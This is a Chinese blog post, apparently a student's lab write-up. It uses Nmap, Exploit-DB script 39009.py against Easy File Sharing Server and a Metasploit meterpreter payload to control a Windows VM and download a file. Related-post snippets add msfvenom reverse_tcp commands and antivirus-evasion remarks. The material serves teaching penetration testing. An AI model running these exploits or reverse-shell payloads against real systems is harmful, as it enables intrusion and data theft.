A:漏洞渗透测试和Metasploit应用

最新推荐文章于 2023-11-29 18:46:25 发布
最新推荐文章于 2023-11-29 18:46:25 发布
阅读量252 收藏 1
点赞数
文章标签: 信息安全 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_53130100/article/details/121594769
版权

任务描述:

一、漏洞渗透测试

1、靶机安装easy file sharing server(efssetup_2018.zip)
2、利用Nmap扫描发现靶机(Windows)运行了该服务。P99-100
3、利用该漏洞,使得靶机运行计算器。P116-119

二、Metasploit应用
1、生成主控端、被控端。
2、获得靶机(Windows)控制权。
3、下载靶机上任意一个文件。

1

在Windows7中安装easyfile sharing

安装方法:在虚拟机选项中选择安装VMware Tools(T)

 好之后,拖到程序到Windows7中即可

得到靶机的地址192.168.197.129

(靶机的网络适配器:仅主机模式)

回到kali

先使用命令nmap 192.168.197.129

查看靶机端口开放情况

使用nmap -sV 192.168.197.129

使用python /usr/share/exploitdb/exploits/windows/remote/39009.py 192.168.197.129 8000

回到window7

 

发现其已经调出了计算器且程序崩了 

2

在var文件目录下找到paylaod.exe

将其拖放到靶机window10上,前提是关闭防火墙和杀毒软件

然后打开它

回到kali

按顺序输入

然后在E盘随便新建一个文本文件

接下来使用 download E:\\hh.txt /home/

(/home/是存放文件位置,如果不想输入最后的/home/,那么路径就会在root文件里,但是我的root文件打不开,所以我选择更换路径)

 

结果: 

总结:

        复现任务A到这里就完成了,这次的作业对我来说挺有意思的,照着书走就行了。当然通过这个作业,我也是学会了kali的很多命令,同时也让我警醒,不明的程序不要轻易打开,防火墙和杀毒软件能时刻打开就时刻打开。

g_qy
关注
kali踩坑指北--searchsploit
weixin_43130853的博客
12-08 2232
一 ·参数介绍: -c, --case [Term] 区分大小写(默认不区分大小写) -e, --exact[Term] 对exploit标题进行EXACT匹配 (默认为 AND) [Implies "-t"]. -h, --help 显示帮助 -j, --json [Term] 以JSON格式显示结果 -m, --mirror [EDB-ID] 把一个exp拷贝到当前工作目录,参数后加目标id -o, --overflow [Term] Exploit标题被允许溢出其列 -p, --path
[课业] | 软件安全 | 使用渗透性工具Metasploit进行漏洞测试
RussellHan的博客
01-31 1569
Metasploit
web渗透实验-平台漏洞利用
最新发布
ysm_zxc的博客
11-29 132
一课一展
信息收集--关联信息及漏洞情报
qq_44555676的博客
08-10 661
关联信息生成和开放漏洞情报一、关联信息生成1.字典生成二、开放漏洞情报1.常用网站2.Search Exploit-DB示例试一试实例1. 查找漏洞2. 本地 kali 中搭建 Apache 服务器3. exp 上传到靶机中4.编译执行 一、关联信息生成 在渗透前期工作开展之前,需要对目标的各种信息进行分析、拆分、组合。 例如:华南师范大学 根据地域习惯、宗教、互联网开放信息等信息进行简要拆分,假设获取的信息如下: 广东人有祭祖习惯 广东人口味清淡 华师学生比较乖、低调、老实本分型,可以线下进行诱导欺
复现实验A
qq_23690313的博客
12-13 2364
复现实验A 一、漏洞渗透测试 1、靶机安装easy file sharing server(efssetup_2018.zip) 2、利用Nmap扫描发现靶机(Windows)运行了该服务。P99-100 3、利用该漏洞,使得靶机运行计算器。P116-119 (1)找出可利用脚本 39009.py (2) (3)调取成功 二、Metasploit应用 1、生成主控端、被控端。 首先打开终端输入msfvenom -p windows/meterpreter/reverse_tcp lhost= 攻击
一起来打靶 01
cmdos的专栏
03-21 756
0x00 靶机介绍靶机地址:BoredHackerBlog: Social Network ~ VulnHub靶机难度:中推荐虚拟机:VirtualBox0x01 内容简介涉及的攻击方法主机发现端口扫描服务发现路径爬取代码注入Shell脚本内网信息收集内网穿透漏洞利用密码破解本地提权攻击代码修改0x02 环境搭建下载好靶机.ova文件后导入到VirtualBox中即可确保靶机和kali在同一网段中kali IP地址:10.0.2.50x03 信息收集因为靶机和kali在同一网段中,所以优先选择二层的主机发现
metasploit中使用lnk漏洞渗透测试.doc
03-18
Metasploit 是一个开源的渗透测试框架,广泛应用于网络安全测试和漏洞利用。LNK 漏洞是一种常见的 Windows 漏洞,通过exploit 可以获得目标机的shell 权限。本文将详细介绍如何使用 Metasploit 中的 LNK 漏洞进行...
pwn:渗透测试Metasploit,二进制开发,逆向工程,加密和其他与CTF相关的活动的日志
04-28
综上所述,这个压缩包资源可能是为了帮助CTF参赛者提升技能,通过实例学习如何进行渗透测试、使用Metasploit框架、分析二进制文件、进行逆向工程,以及理解和应用加密技术。如果想要深入这些领域,可以详细探索这个...
渗透测试Metasploit
06-16
Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序...
Web渗透测试实战:基于Metasploit 5.0
华章IT官方博客
03-28 4113
在当今快速发展的技术世界中,信息安全行业正以惊人的速度变化,与此同时,针对组织的网络攻击数量也在迅速增加。为了保护自己免受这些来自真实世界的攻击,许多组织在其流程管理中引入了安全审计以及风险和漏洞评估机制,旨在评估与其业务资产有关的风险。为了保护IT资产,许多组织聘请信息安全专业人员,以识别组织的应用程序和网络中可能存在的风险、漏洞和威胁。对于信息安全专业人员来说,掌握并...
easy file sharing server漏洞渗透测试Metasploit应用
zzzfff__的博客
11-06 468
1、靶机(Windows)安装easy file sharing server(efssetup_2018.zip),该服务存在漏洞。 2、利用Nmap扫描发现靶机(Windows)运行了该服务。 3、利用该漏洞,使得靶机运行计算器。
靶机渗透测试实战(三)——DC-3
weixin_45116657的博客
10-10 3460
实验环境 靶机(DC-3),IP地址未知; 测试机kali,IP地址:192.168.85.131 实验步骤: 1、 主机扫描 命令:1. Arp-scan -l 没有发现靶机IP,判断靶机没有分配到IP地址,因此先进去单用户设置网络 2、重启靶机 2.1> 启动系统后,我们按e键进入grub模式; 2.2> Ctrl +x 进入单用户模式; 2.3> 进入编辑...
Exploit-DB漏洞利用库
dj1174232716的专栏
08-02 7541
Backtrack 已经内置了一个由” Offebnsive Security”提供的漏洞利用程序集的数据库Exploit-DB,可以用于平时的参考和使用。访问的方法是在命令提示符中输入一下命令: # cd /pentest/exploits/exploitdb/ # cat files.csv | less 即可查看所有内置的漏洞利用程序集,这将会打开Exploit-DB在/pentes
漏洞渗透测试easy file sharing server
qq_51926773的博客
11-07 3441
一,在靶机上安装easy file sharing server,安装启动好后,配置必要信息。 其中,upl填靶机的ip地址。 二,配置好相关信息后,进入kali,输入下面截图命令,获取easy file sharing server该漏洞。 然后再输入命令:python /usr/share/exploitdb/exploits/windows/remote/39009.py 靶机IP。其中用39009漏洞进行实验。 回车后会发现靶机崩溃并允许计算机。 结束。 ...
Metasploit应用
m0_64005272的博客
11-05 717
使用命令:msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.131.128 lport=5000 -f exe -o /var/payload.exe。接下来输入命令:download C:\\hh.txt /home/ 下载hh.txt文件到home文件夹里。lhost的值为Kali的ip,保存的位置为:/var/payload.exe。结果在home文件夹中找到hh.txt。在var文件目录下找到payload.exe。
复现任务A
weixin_51939939的博客
12-15 260
一、漏洞渗透测试 1、靶机安装easy file sharing server(efssetup_2018.zip) 2、利用Nmap扫描发现靶机(Windows)运行了该服务。P99-100 3、利用该漏洞,使得靶机运行计算器。P116-119 我们使用一个Windows虚拟机作为靶机来运行Easy File Sharing Server软件。 然后在Kali虚拟机使用nmap -sV IP地址扫描端口,可以看到80端口运行了easy file sharing server httpd 6..
Metasploit靶机漏洞实践检验
热门推荐
Birldlee的博客
12-27 1万+
使用Metasploit渗透测试软件对Metasploitable靶机系统主机进行攻击,检验各种常见靶机漏洞的情况。
远程控制(easy file sharing web server)验证性实验
qq_45538874的博客
11-02 470
实验过程 首先在电脑上打开easy file sharing web server 并设置好端口 进入kali中扫描该软件的漏洞 此时,利用39009溢出漏洞进行验证性实验。进入kali中,输入python /usr/share/exploitdb/exploits/windows/remote/39009.py 192.168.127.1 8000 此时,kali中的渗透模块就会连接到192.168.127.1的8000端口,并将指定代码发送过去 执行完成后,easy file sharing we
一文带你手撕metasploit中meterprter木马源码_雁不过衡阳
MRyYang的博客
05-13 687
前言 自从将CobaltStrike二开之后放在了GITHUB之后,有些人询问我当时MSF的源码级免杀怎么做的,今天决定带大家手撕metasploit中meterpreter源码。 生成meterpreter木马 msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=4444 > yanbuguohengyang.jar 使用Jd-Gui反编译Jar文件 下载Jd-Gui https://download.apponic.c
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值